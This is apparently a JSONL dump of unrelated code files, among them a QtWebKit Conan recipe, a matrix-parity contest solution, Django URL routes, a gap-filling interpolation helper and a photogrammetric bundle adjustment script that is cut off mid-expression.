{"seq_id":"98920471","text":"\n\nfrom xai.brain.wordbase.adverbs._super import _SUPER\n\n#class header\nclass _SUPERS(_SUPER, ):\n\tdef __init__(self,): \n\t\t_SUPER.__init__(self)\n\t\tself.name = \"SUPERS\"\n\t\tself.specie = 'adverbs'\n\t\tself.basic = \"super\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adverbs/_supers.py","file_name":"_supers.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"212238458","text":"from conans import ConanFile, CMake, tools\nimport os\nimport platform\n\n\nclass QtWebKitConan(ConanFile):\n    name = \"qtwebkit\"\n    version = \"5.212.0-alpha4\"\n    license = \"LGPL-2.0-or-later, LGPL-2.1-or-later, BSD-2-Clause\"\n    homepage = \"https://github.com/qtwebkit/qtwebkit\"\n    description = \"Qt port of WebKit\"\n    topics = (\"qt\", \"browser-engine\", \"webkit\", \"qt5\", \"qml\", \"qtwebkit\")\n    settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n    generators = 'cmake'\n    exports_sources = [\n        \"clang-11-jsc.patch\",\n    ]\n    _source_subfolder = \"source_subfolder\"\n    _build_subfolder = \"build_subfolder\"\n\n    options = {\n        \"with_bmalloc\": [True, False],\n        \"with_geolocation\": [True, False],\n        \"with_gstreamer\": [True, False],\n        \"with_libhyphen\": [True, False],\n        \"with_webcrypto\": [True, False],\n        \"with_webkit2\": [True, False],\n        \"with_woff2\": [True, False]\n    }\n\n    default_options = {\n        \"icu:shared\": True,\n\n        \"libxml2:shared\": True,\n        \"libxslt:shared\": True,\n\n        \"libjpeg-turbo:shared\": False,\n        \"zlib:shared\": False,\n        \"libpng:shared\": False,\n        \"sqlite3:shared\": False,\n        \"libwebp:shared\": False,\n\n        \"with_bmalloc\": False,\n\n        \"with_geolocation\": False,\n        \"with_gstreamer\": False,\n        \"with_libhyphen\": False,\n        \"with_webcrypto\": False,\n        \"with_webkit2\": False,\n        \"with_woff2\": False,\n\n        \"qt:qtsvg\": True,\n        \"qt:qtx11extras\": platform.system() == \"Linux\",\n        \"qt:qtimageformats\": True,\n        \"qt:qtscript\": True,\n        \"qt:qttools\": True,\n        \"qt:qtmultimedia\" : True,\n\n        \"qt:with_glib\": False,\n        \"qt:with_harfbuzz\": False,\n        \"qt:with_icu\": False,\n        \"qt:with_pcre2\": False,\n        \"qt:with_mysql\": False,\n        \"qt:with_sdl2\": False,\n        \"qt:with_zstd\": False\n    }\n\n    requires = (\n        \"qt/5.14.1\",\n        \"libjpeg-turbo/2.0.4\",\n        \"libpng/1.6.37\",\n        \"libwebp/1.1.0\",\n        \"sqlite3/3.31.0\",\n        \"icu/64.2\",\n        \"libxml2/2.9.9\",\n        \"libxslt/1.1.33\",\n        \"zlib/1.2.11\"\n    )\n\n    def build_requirements(self):\n        pass\n\n    def 
requirements(self):\n        if self.options[\"with_webcrypto\"]:\n            self.requires(\"libgcrypt/1.8.4@bincrafters/stable\")\n\n        if self.options[\"with_gstreamer\"]:\n            self.requires(\"gstreamer/1.16.0@bincrafters/stable\")\n\n        if self.options[\"with_libhyphen\"]:\n            pass # TODO add dependency when somebody writes a recipe for libhyphen\n\n        if self.options[\"with_woff2\"]:\n            pass # TODO wait until https://github.com/qtwebkit/conan-woff2 is deployed on bintray\n\n    def source(self):\n        tools.get(f'{self.homepage}/releases/download/{self.name}-{self.version}/{self.name}-{self.version}.tar.xz',\n                  sha256='9ca126da9273664dd23a3ccd0c9bebceb7bb534bddd743db31caf6a5a6d4a9e6')\n        os.rename(f'{self.name}-{self.version}', self._source_subfolder)\n\n        # check recipe consistency\n        tools.check_with_algorithm_sum(\"sha1\", \"clang-11-jsc.patch\", \"c8d0b0c68f96b58e07c22276086ac9007cc761e2\")\n\n        # apply patches\n        if tools.is_apple_os(self.settings.os):\n            tools.patch(base_path = self._source_subfolder, patch_file = \"clang-11-jsc.patch\", strip = 1)\n\n    def _configure_cmake(self):\n        cmake = CMake(self)\n\n        cmake.definitions[\"PORT\"] = \"Qt\"\n        cmake.definitions[\"ENABLE_DEVICE_ORIENTATION\"] = \"OFF\"\n        cmake.definitions[\"ENABLE_TEST_SUPPORT\"] = \"OFF\"\n\n        # TODO on linux we should check kernel version. On kernels < 3.4 bmalloc cannot be compiled\n        if not self.options[\"with_bmalloc\"]:\n            cmake.definitions[\"USE_SYSTEM_MALLOC\"] = \"ON\"\n        if not self.options[\"with_geolocation\"]:\n            # TODO check if QtLocation module was built\n            cmake.definitions[\"ENABLE_GEOLOCATION\"] = \"OFF\"\n        if not self.options[\"with_gstreamer\"]:\n            cmake.definitions[\"USE_GSTREAMER\"] = \"OFF\"\n        if not self.options[\"with_libhyphen\"]:\n            cmake.definitions[\"USE_LIBHYPHEN\"] = \"OFF\"\n        if not self.options[\"with_webcrypto\"]:\n            cmake.definitions[\"ENABLE_WEB_CRYPTO\"] = \"OFF\"\n        if not self.options[\"with_webkit2\"]:\n            cmake.definitions[\"ENABLE_WEBKIT2\"] = \"OFF\"\n            cmake.definitions[\"ENABLE_QT_GESTURE_EVENTS\"] = \"OFF\"\n        if not self.options[\"with_woff2\"]:\n            cmake.definitions[\"USE_WOFF2\"] = \"OFF\"\n\n        cmake.definitions[\"QT_CONAN_DIR\"] = os.getcwd()\n\n        qt_dir = self.deps_cpp_info[\"qt\"]\n        cmake.definitions[\"Qt5_DIR\"] = os.path.join(qt_dir.libdirs[0], \"cmake\", \"Qt5\")\n\n        cmake.configure(build_folder=self._build_subfolder, source_folder=self._source_subfolder)\n\n        return cmake\n\n    def build(self):\n        cmake = self._configure_cmake()\n        cmake.build()\n        cmake.install()\n\n    def package(self):\n        pass\n\n    def package_info(self):\n        if tools.is_apple_os(self.settings.os):\n            libs = [\n                \"QtWebKit\",\n                \"QtWebKitWidgets\"\n            ]\n            self.cpp_info.frameworkdirs = ['lib']\n            self.cpp_info.frameworks = [lib for lib in libs]\n        else:\n            libs = [\n                \"Qt5WebKit\",\n                \"Qt5WebKitWidgets\"\n            ]\n            self.cpp_info.libdirs.append('lib')\n            self.cpp_info.libs = [lib for lib in libs]\n        self.env_info.CMAKE_PREFIX_PATH.append(self.package_folder)\n","sub_path":"recipes/qtwebkit/5.212.0-alpha4/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"615285145","text":"# to exit the program when the user input is not correct\nimport sys\ntry:\n    t = int(input())\n    # test input in these allowed limits\n    if t>=1 and t<=300:\n        pass\n    else:\n        # exit the program if not\n        raise sys.exit()\nexcept:\n    # exit when no input is given\n    # and this catches EOF(end of file) exception\n    sys.exit()\n\n# Initialize N,M,Q to keep track of the sum of 
n,m,q\n# (should not exceed 3*10**5)\nN,M,Q = 0,0,0\n# iterate over test cases\nwhile(t):\n t -= 1\n try:\n n,m,q = map(int,input().split())\n # if values of n,m,q out of constraint then exit.\n if n<1 or n>10**5 or m<1 or m>10**5 or q<1 or q>10**5:\n raise sys.exit()\n # catches EOF exception\n except:\n sys.exit()\n # as explained above\n N += n\n M += m\n Q += q\n\n # if the sum exceeds 3*10**5, stop execution\n if N > 3*(10**5) or M > 3*(10**5) or Q > 3*(10**5):\n raise sys.exit()\n\n # dictionary to keep track of which row,col gets repeated\n # and how many times\n row, col = {},{}\n # intialized to zero\n num_odd_row, num_odd_col = 0,0\n\n # iterate all the operations\n while q:\n q -= 1\n try:\n # r for row and c for column\n r,c = map(int,input().split())\n # if r and c out of matrix dimentions\n # then exit program\n if r<1 or r>n or c<1 or c>m:\n raise sys.exit()\n # catches eof exception\n except:\n sys.exit()\n\n # checks if the row is already in row or col dictionary\n # rcheck is boolean value true or false\n rcheck = (r in row.keys())\n # similarly ccheck for col\n ccheck = (c in col.keys())\n\n # if any of row or column is repeated\n if rcheck or ccheck:\n # if both repeated increment both by one\n if rcheck and ccheck:\n col[c] += 1\n row[r] += 1\n # else increment r, is the new row, set it to one\n # and increment c by one\n elif ccheck:\n col[c] += 1\n row[r] = 1\n # else increment c, is the new col, set it to one\n # and increment r by one\n elif rcheck:\n row[r] += 1\n col[c] = 1\n # this will not happen when both r and c are new\n # because the condition doesn't allow\n else:\n pass\n # if both points are new\n else:\n # set r to one\n row[r] = 1\n # set c to one\n col[c] = 1\n\n # number of odd rows or columns\n for i in row.values():\n # dictionary is (key,value) pair\n # for every value in row check if odd\n # if so, increment by one\n if i%2 == 1:\n # counts all odd rows\n num_odd_row += 1\n # same thing for col\n for i in col.values():\n if i%2 == 1:\n num_odd_col += 1\n # total odd points =\n # oddrow * evencol + oddcol * evenrow\n oddpts = (n-num_odd_row)*num_odd_col + (m-num_odd_col)*num_odd_row\n print(oddpts)\n","sub_path":"SAKTEN.py","file_name":"SAKTEN.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"157693336","text":"import json\nfrom unittest.mock import Mock\n\nfrom main import get_dog_pair, submit_vote, get_votes, register_voter\n\n\ndef mock_request(data):\n return Mock(get_json=Mock(return_value=data), args=data)\n\n\ndef test_vote():\n voter_data = {\n \"gender_identity\": \"test\",\n \"age\": 20,\n \"education\": 0,\n \"location\": \"test\",\n \"dog_ownership\": False,\n \"northeastern_relationship\": \"test\",\n }\n\n result = json.loads(register_voter(mock_request(voter_data))[0])\n id1 = result[\"dog1\"]\n id2 = result[\"dog2\"]\n voter_uuid = result[\"voter_uuid\"]\n assert id1 != id2\n\n voteFor1 = {\n \"dog1_id\": id1,\n \"dog2_id\": id2,\n \"winner\": id1,\n \"voter_uuid\": voter_uuid,\n }\n\n def get_votes_dog1(id1, id2):\n return json.loads(get_votes(mock_request({\"id\": id1}))[0]).get(str(id2), {\"wins\": 0, \"losses\": 0, \"ties\": 0})\n\n vote_count = get_votes_dog1(id1, id2)\n submit_vote(mock_request(voteFor1))\n\n vote_count_after = get_votes_dog1(id1, id2)\n\n assert vote_count_after[\"wins\"] == vote_count[\"wins\"] + 1\n assert vote_count_after[\"losses\"] == vote_count[\"losses\"]\n assert vote_count_after[\"ties\"] == 
vote_count[\"ties\"]\n\n result = json.loads(get_dog_pair(mock_request(voter_uuid))[0])\n id1 = result[\"dog1\"]\n id2 = result[\"dog2\"]\n assert id1 != id2\n\n tie_vote = {\n \"dog1_id\": id1,\n \"dog2_id\": id2,\n \"winner\": -1,\n \"voter_uuid\": voter_uuid,\n }\n\n vote_count = get_votes_dog1(id1, id2)\n submit_vote(mock_request(tie_vote))\n vote_count_after = get_votes_dog1(id1, id2)\n assert vote_count_after[\"wins\"] == vote_count[\"wins\"]\n assert vote_count_after[\"losses\"] == vote_count[\"losses\"]\n assert vote_count_after[\"ties\"] == vote_count[\"ties\"] + 1\n\n\n","sub_path":"functions/test/integration/test_cloud_voting.py","file_name":"test_cloud_voting.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"21348740","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom ask_maksimov.views import *\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n\turl('^signup$', signup, name='signup'),\n\turl('^login$', login, name='login'),\n\turl('^logout$', log_out, name = 'logout'),\n\turl('^profile/edit$', profile_edit, name = 'profile_edit'),\n\turl('^ask_question$', ask_question, name='ask_question'),\n\turl('^hot$', hot, name = 'hot'),\n\turl(r'^to_like$', like, name = 'like'),\n\turl(r'^question/(?P<question_id>\\d+)/((?P<page>\\d+)/?)?', question, name = 'question'),\n\turl(r'^(tag/(?P<tag_value>\\w+)/)?(?P<page>\\d+)?/?', index, name = 'index'),\n]\n","sub_path":"ask_maksimov/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206938929","text":"\"\"\"ADD MODULE DOCSTRING HERE\"\"\"\n\n# Standard Library\nimport logging\nfrom datetime import timedelta\n\n# Third-party\nimport pandas as pd\n\n# Local modules/packages\nfrom .datasets import list_files, get_tbarr\n\n#------------------------------------------------------------------------------#\n\n__all__ = ['interp1d']\n\n#------------------------------------------------------------------------------#\n\nlogger = logging.getLogger(__name__)\n\n#------------------------------------------------------------------------------#\n\ndef interp1d(array):\n \"\"\"Fill in temporal gaps through linear interpolation.\n\n Parameters\n ----------\n array : xarray.DataArray\n 3D array to be filled. Must have a 'time' dimension.\n\n Returns\n -------\n array_filled: xarray.DataArray\n Description\n\n Raises\n ------\n SystemExit\n Description\n \"\"\"\n dates = array['time'].to_index()\n if dates.has_duplicates:\n logging.error('Dates must be unique. 
Found duplicates.')\n raise SystemExit\n\n dates_all = pd.date_range(\n start=dates.min(),\n end=dates.max(),\n freq='D')\n array_filled = array.reindex(indexers={'time': dates_all})\n dates_present = dates\n dates_missing = set(dates_all) - set(dates_present)\n dates_missing = sorted(list(dates_missing))\n\n if dates_missing:\n\n logger.debug('Found the following gaps:')\n for date in dates_missing:\n logger.debug('%11s', date.strftime('%Y-%m-%d'))\n\n logger.debug('Interpolating:')\n for date in dates_missing:\n prev_day = date - timedelta(days=1)\n next_day = date + timedelta(days=1)\n if set([prev_day, next_day]).issubset(dates_present):\n logger.debug(' Filling %s', date.strftime('%Y-%m-%d'))\n array_filled.loc[date] = (array_filled.loc[prev_day] + \\\n array_filled.loc[next_day]) * 0.5\n else:\n logger.debug(' Skipping %s', date.strftime('%Y-%m-%d'))\n\n return array_filled\n else:\n logger.debug('Record complete. No interpolation needed.')\n return array\n\n#------------------------------------------------------------------------------#\n","sub_path":"packages/nsidc/interp.py","file_name":"interp.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515005708","text":"# Created by Jae Sung Kim (The Pennsylvania State University Libraries).\n# Last modified: 08/31/21\n# Example of running: python3 bba_nr.py io_nr.txt fiducial_mark.txt EO_init_1.txt control.txt bba_result_nr_1.txt 1 2 1 control_uncertainty.txt \n# 1 2 1: 1 control, 2 check, 1 correction for atmospheric refraction\n# The unit of ground space coordinate is assumed to be feet.\n\n\"\"\"\nMIT License\n\nCopyright (c) 2021 Penn State University Libraries\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\nimport math, csv, json, os\nimport numpy as np\nfrom math import cos, sin, tan, atan2\nfrom numpy import zeros, eye, matmul\nfrom numpy.linalg import inv\nimport sys\n\ndef main():\n\n\t\n\targv=sys.argv\n\tio_reader = csv.DictReader(open(argv[1]))\n\tfd_reader = csv.DictReader(open(argv[2]))\n\teo_reader = csv.DictReader(open(argv[3]))\n\tcp_reader = csv.DictReader(open(argv[4]))\n\tar=int(argv[8])\n\tuncertainty_reader = csv.DictReader(open(argv[9]))\n\t\n\twith open(argv[5],'w') as output_file:\n\t\tcsv_writer = csv.writer(output_file)\n\t\tcsv_writer.writerow([\"output\"])\n\t\n\tio_data = list(io_reader)[0]\n\tf = float(io_data['focal_mm'])\n\tx_0 = float(io_data['xp_mm'])\n\ty_0 = float(io_data['yp_mm'])\n\tf1x = float(io_data['f1x'])\n\tf1y = float(io_data['f1y'])\n\tf2x = float(io_data['f2x'])\n\tf2y = float(io_data['f2y'])\n\tf3x = float(io_data['f3x'])\n\tf3y = float(io_data['f3y'])\n\tf4x = float(io_data['f4x'])\n\tf4y = float(io_data['f4y'])\n\tf5x = float(io_data['f5x'])\n\tf5y = float(io_data['f5y'])\n\tf6x = float(io_data['f6x'])\n\tf6y = float(io_data['f6y'])\n\tf7x = float(io_data['f7x'])\n\tf7y = float(io_data['f7y'])\n\tf8x = float(io_data['f8x'])\n\tf8y = float(io_data['f8y'])\n\t\n\tfd_data = list(fd_reader)\n\tfd_dict={}\n\tfor fd in fd_data:\n\t\tfd_key = fd['image_id']\n\t\tfd.pop('image_id')\n\t\tfd_dict[fd_key] = fd\n\n\teo_data = list(eo_reader)\n\teo_dict = {}\n\tfor eo in eo_data:\n\t\teo_key = eo['image_id']\n\t\teo.pop('image_id')\n\t\teo_dict[eo_key] = eo\n\n\tcp_data = list(cp_reader)\n\tcp_dict = {}\n\tcp_list=[]\n\tfor cp in cp_data:\n\t\tcp_key = cp['point_id']\n\t\tif cp_key not in cp_list:\n\t\t\tcp_list.append(cp_key)\n\t\t\tcp_dict[cp_key] = {'X':cp['X'],'Y':cp['Y'],'Z':cp['Z']}\n\n\tcontrol = list(filter(lambda x: x['groupid']==argv[6], cp_data))\n\tcheck = list(filter(lambda x: x['groupid']==argv[7], cp_data))\n\t\n\tuncertainty_data = list(uncertainty_reader)\n\t\n\tfor uncertainty in uncertainty_data:\n\t\tsig_x = float(uncertainty['X'])\n\t\tsig_y = float(uncertainty['Y'])\n\t\tsig_z = float(uncertainty['Z'])\n\t\t\n\tsix_par={}\n\timg_data=[*eo_dict]\n\tno_img=len(img_data)\n\n\tfor i in 
range(no_img):\n\t\t\n\t\tfm=np.array([[float(fd_dict[img_data[i]]['x1'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y1'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x2'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y2'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x3'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y3'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x4'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y4'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x5'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y5'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x6'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y6'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x7'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y7'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['x8'])],\n\t\t\t\t[float(fd_dict[img_data[i]]['y8'])]])\n\t\t\n\t\tx1=fm[0,0]\n\t\ty1=fm[1,0]\n\t\tx2=fm[2,0]\n\t\ty2=fm[3,0]\n\t\tx3=fm[4,0]\n\t\ty3=fm[5,0]\n\t\tx4=fm[6,0]\n\t\ty4=fm[7,0]\n\t\tx5=fm[8,0]\n\t\ty5=fm[9,0]\n\t\tx6=fm[10,0]\n\t\ty6=fm[11,0]\n\t\tx7=fm[12,0]\n\t\ty7=fm[13,0]\n\t\tx8=fm[14,0]\n\t\ty8=fm[15,0]\n\t\t\n\t\txyc=np.array([[f1x],[f1y],[f2x],[f2y],[f3x],[f3y]])\n\t\tfpm=np.array([[x1,y1,1,0,0,0],[0,0,0,x1,y1,1],[x2,y2,1,0,0,0],[0,0,0,x2,y2,1],[x3,y3,1,0,0,0],[0,0,0,x3,y3,1]])\n\t\tdelta=matmul(inv(fpm),xyc)\t\n\t\tfc=np.array([[f1x],[f1y],[f2x],[f2y],[f3x],[f3y],[f4x],[f4y],[f5x],[f5y],[f6x],[f6y],[f7x],[f7y],[f8x],[f8y]])\n\t\tL0=fm\n\t\tL=L0\n\t\tWW=eye(16)\n\t\tlast_phi = 10\n\t\tkeep_going = 1\n\t\titer = 0\n\t\twhile keep_going == 1:\n\t\t\tAA=zeros([16,16])\n\t\t\tBB=zeros([16,6])\n\t\t\tFF=zeros([16,1])\n\t\t\ta1=delta[0,0]\n\t\t\ta2=delta[1,0]\n\t\t\ta3=delta[2,0]\n\t\t\ta4=delta[3,0]\n\t\t\ta5=delta[4,0]\n\t\t\ta6=delta[5,0]\n\t\t\tfor j in range(8):\n\t\t\t\trx=L[2*j,0]\n\t\t\t\try=L[2*j+1,0]\n\t\t\t\tx=fc[2*j,0]\n\t\t\t\ty=fc[2*j+1,0]\n\t\t\t\tF_s = np.array([[x-a1*rx-a2*ry-a3],[y-a4*rx-a5*ry-a6]])\n\t\t\t\tA_s = np.array([[-a1, -a2],[-a4, -a5]])\n\t\t\t\tB_s = np.array([[-rx, -ry, -1, 0, 0, 0],[0, 0, 0, -rx, -ry, -1]])\n\t\t\t\tFF[2*j:2*j+2,:] = F_s\n\t\t\t\tAA[2*j:2*j+2,2*j:2*j+2] = A_s\n\t\t\t\tBB[2*j:2*j+2,:] = B_s\n\t\t\t\t\n\t\t\tQ=inv(WW)\n\t\t\tff=-FF-matmul(AA,(L0-L))\n\t\t\tQe=matmul(matmul(AA,Q),AA.T)\n\t\t\tWe=inv(Qe)\n\n\t\t\tN=matmul(matmul(BB.T,We),BB)\n\t\t\tt=matmul(matmul(BB.T,We),ff)\n\t\t\tddel=matmul(inv(N),t)\n\t\t\tv=matmul(matmul(matmul(Q,AA.T),We),(ff-matmul(BB,ddel)))\n\t\t\tphi=matmul(matmul(v.T,WW),v)\n\t\t\tobj=abs((last_phi-phi[0,0])/last_phi)\n\t\t\tprint(\"iter number: \"+str(iter))\n\t\t\tprint(\"objective function is : \"+str(obj))\n\t\t\t#Convergence check\n\t\t\tif obj<0.0001:\n\t\t\t\tkeep_going=0\n\t\t\t\tprint(\"Converged\")\n\t\t\t\tsix_par[img_data[i]]=delta\n\t\t\t\t\t\n\t\t\tL=L0+v\n\t\t\tdelta=delta+ddel\n\n\t\t\t\n\t\t\tif iter>100:\n\t\t\t\tkeep_going=0\n\t\t\t\tprint(\"too many iterations\")\n\n\t\t\tlast_phi = phi[0,0]\n\t\t\titer=iter+1\n\n\tno_obs = len(control)\n\tL0 = zeros((no_obs*2,1))\n\timage_list = []\t\t\n\tcontrol_list = []\n\tWW = zeros((2*no_obs,2*no_obs))\n\tfor i in range(no_obs):\n\t\tif control[i]['img_id'] not in image_list:\n\t\t\timage_list.append(control[i]['img_id'])\n\t\tif control[i]['point_id'] not in control_list:\n\t\t\tcontrol_list.append(control[i]['point_id'])\n\t\t\n\t\txx1 = float(control[i]['sample'])\n\t\tyy1 = float(control[i]['line'])\n\t\ta1 = six_par[control[i]['img_id']][0]\n\t\ta2 = six_par[control[i]['img_id']][1]\n\t\ta3 = six_par[control[i]['img_id']][2]\n\t\ta4 = six_par[control[i]['img_id']][3]\n\t\ta5 = six_par[control[i]['img_id']][4]\n\t\ta6 = 
six_par[control[i]['img_id']][5]\n\t\t\n\t\txx = a1*xx1+a2*yy1+a3-x_0\n\t\tyy = a4*xx1+a5*yy1+a6-y_0\n\t\trr = np.sqrt(xx**2+yy**2)\n\t\t\n\t\tif ar==1:\n\t\n\t\t\tH = float(eo_dict[control[i]['img_id']]['ZL'])\n\t\t\tHH = 0.0003048*H\n\t\t\thh = 0.0003048*float(control[i]['Z'])\n\t\t\tK= (2410*HH/(HH**2-6*HH+250)-2410*hh/(hh**2-6*hh+250)*(hh/HH))/1000000\n\t\t\tdr=-K*(rr+rr**3/f**2)\n\t\t\txx=xx+xx/rr*dr\n\t\t\tyy=yy+yy/rr*dr\n\t\t\t\n\t\t\t\n\t\tL0[2*i,0] = xx\n\t\tL0[2*i+1,0] = yy\n\t\t\n\t\tWW[2*i,2*i] = 1\n\t\tWW[2*i+1,2*i+1] = 1\n\t\t\n\tWxx = zeros((6*len(image_list)+3*len(control_list),6*len(image_list)+3*len(control_list))) \n\tWxyz = zeros((3*len(control_list),3*len(control_list)))\n\tdelta = zeros((6*len(image_list)+3*len(control_list),1))\n\t\n\tfor i in range(len(image_list)):\n\t\tWxx[6*i,6*i]=(1/(3.28084*100))**2\n\t\tWxx[6*i+1,6*i+1]=(1/(3.28084*100))**2\n\t\tWxx[6*i+2,6*i+2]=(1/(3.28084*100))**2\n\t\tWxx[6*i+3,6*i+3]=(1/(10/(180*np.pi)))**2\n\t\tWxx[6*i+4,6*i+4]=(1/(10/(180*np.pi)))**2\n\t\tWxx[6*i+5,6*i+5]=(1/(10/(180*np.pi)))**2\n\t \n\tfor i in range(len(control_list)):\n\t\tWxyz[3*i,3*i]=(1/sig_x)**2\n\t\tWxyz[3*i+1,3*i+1]=(1/sig_y)**2\n\t\tWxyz[3*i+2,3*i+2]=(1/sig_z)**2\n\n\tWxx[6*len(image_list):6*len(image_list)+3*len(control_list),6*len(image_list):6*len(image_list)+3*len(control_list)] = Wxyz\n\t\n\tfor i in range(len(image_list)):\n\t\tdelta[6*i,0]=float(eo_dict[image_list[i]]['XL'])\n\t\tdelta[6*i+1,0]=float(eo_dict[image_list[i]]['YL'])\n\t\tdelta[6*i+2,0]=float(eo_dict[image_list[i]]['ZL'])\n\t\tdelta[6*i+3,0]=float(eo_dict[image_list[i]]['omega'])\n\t\tdelta[6*i+4,0]=float(eo_dict[image_list[i]]['phi'])\n\t\tdelta[6*i+5,0]=float(eo_dict[image_list[i]]['kappa'])\n\n\tfor i in range(len(control_list)):\n\t\tdelta[6*len(image_list)+3*i,0]=float(cp_dict[control_list[i]]['X'])\n\t\tdelta[6*len(image_list)+3*i+1,0]=float(cp_dict[control_list[i]]['Y'])\n\t\tdelta[6*len(image_list)+3*i+2,0]=float(cp_dict[control_list[i]]['Z'])\n\t\t\n\tlast_phi = 10\n\tkeep_going = 1\n\titer = 0\n\tL=L0\n\tdelta_0=delta\n\twhile keep_going == 1:\n\t\tFF=zeros((no_obs*2,1))\n\t\tAA=zeros((no_obs*2,no_obs*2))\n\t\tBB=zeros((no_obs*2,6*len(image_list)+3*len(control_list)))\n\t\tfor i in range(no_obs):\n\t\t\timg_ind=image_list.index(control[i]['img_id'])\n\t\t\tpt_ind=control_list.index(control[i]['point_id'])\n\t\t\tx = L[2*i,0] \n\t\t\ty = L[2*i+1,0]\n\t\t\tXL = delta[6*img_ind,0]\n\t\t\tYL = delta[6*img_ind+1,0]\n\t\t\tZL = delta[6*img_ind+2,0]\n\t\t\to = delta[6*img_ind+3,0]\n\t\t\tp = delta[6*img_ind+4,0]\n\t\t\tk = delta[6*img_ind+5,0]\n\t\t\tX=delta[6*len(image_list)+3*pt_ind,0]\n\t\t\tY=delta[6*len(image_list)+3*pt_ind+1,0]\t\t\t\n\t\t\tZ=delta[6*len(image_list)+3*pt_ind+2,0]\n\t\t\tM = np.array([[cos(p)*cos(k), cos(o)*sin(k)+sin(o)*sin(p)*cos(k), sin(o)*sin(k)-cos(o)*sin(p)*cos(k)],\n\t\t\t\t\t\t[-cos(p)*sin(k), cos(o)*cos(k)-sin(o)*sin(p)*sin(k), sin(o)*cos(k)+cos(o)*sin(p)*sin(k)],\n\t\t\t\t\t\t[sin(p), -sin(o)*cos(p), cos(o)*cos(p)]])\n\n\t\t\t\n\t\t\tU = M[0,0]*(X-XL)+M[0,1]*(Y-YL)+M[0,2]*(Z-ZL)\n\t\t\tV = M[1,0]*(X-XL)+M[1,1]*(Y-YL)+M[1,2]*(Z-ZL)\n\t\t\tW = M[2,0]*(X-XL)+M[2,1]*(Y-YL)+M[2,2]*(Z-ZL)\n\t\t\t\n\n\t\t\tF_s = np.array([[x+f*U/W],[y+f*V/W]])\n\t\t\t\t\n\t\t\tUo = M[0,1]*(Z-ZL)-M[0,2]*(Y-YL)\t\n\t\t\tUp = -W*cos(k)\n\t\t\tUk = V\n\t\t\t\n\t\t\tVo = M[1,1]*(Z-ZL)-M[1,2]*(Y-YL)\n\t\t\tVp = W*sin(k)\n\t\t\tVk = -U\n\t\t\t\n\t\t\tWo = M[2,1]*(Z-ZL)-M[2,2]*(Y-YL)\n\t\t\tWp = U*cos(k)-V*sin(k)\n\t\t\tWk = 0\n\t\t\t\n\t\t\tB11 = f*(-M[0,0]+U/W*M[2,0])/W\n\t\t\tB12 = 
